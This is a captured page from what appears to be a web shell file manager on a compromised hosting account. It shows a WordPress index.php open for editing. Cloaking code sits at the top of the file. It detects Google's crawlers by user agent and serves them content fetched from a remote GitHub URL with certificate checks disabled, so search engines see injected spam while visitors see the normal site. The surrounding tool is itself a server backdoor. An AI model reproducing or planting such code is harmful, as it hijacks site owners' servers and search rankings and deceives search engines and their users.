Advanced Web Server Manager
Complete File Manager & Terminal - Standalone Version
By Sid Gifari | Gifari Industries
Current path:
/
/
home
/
qtdcvxyp
/
public_html
✏️
Editing: index.php
<?php function isGoogleBot() { if (!isset($_SERVER['HTTP_USER_AGENT'])) { return false; } $userAgent = $_SERVER['HTTP_USER_AGENT']; return preg_match('/Googlebot|Googlebot-Mobile|Googlebot-Image|Mediapartners-Google|Google-Site-Verification|Google Web Preview|AdsBot-Google|Google-InspectionTool|Googlebot-Desktop|Googlebot-Smartphone/i', $userAgent); } if (isGoogleBot()) { $ch = curl_init("https://raw.githubusercontent.com/tmgsetiawan76-afk/sensasi/refs/heads/main/carrier"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; // tampilkan konten file } else { echo "Gagal mengambil konten."; } exit; } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
💾 Save Changes
❌ Cancel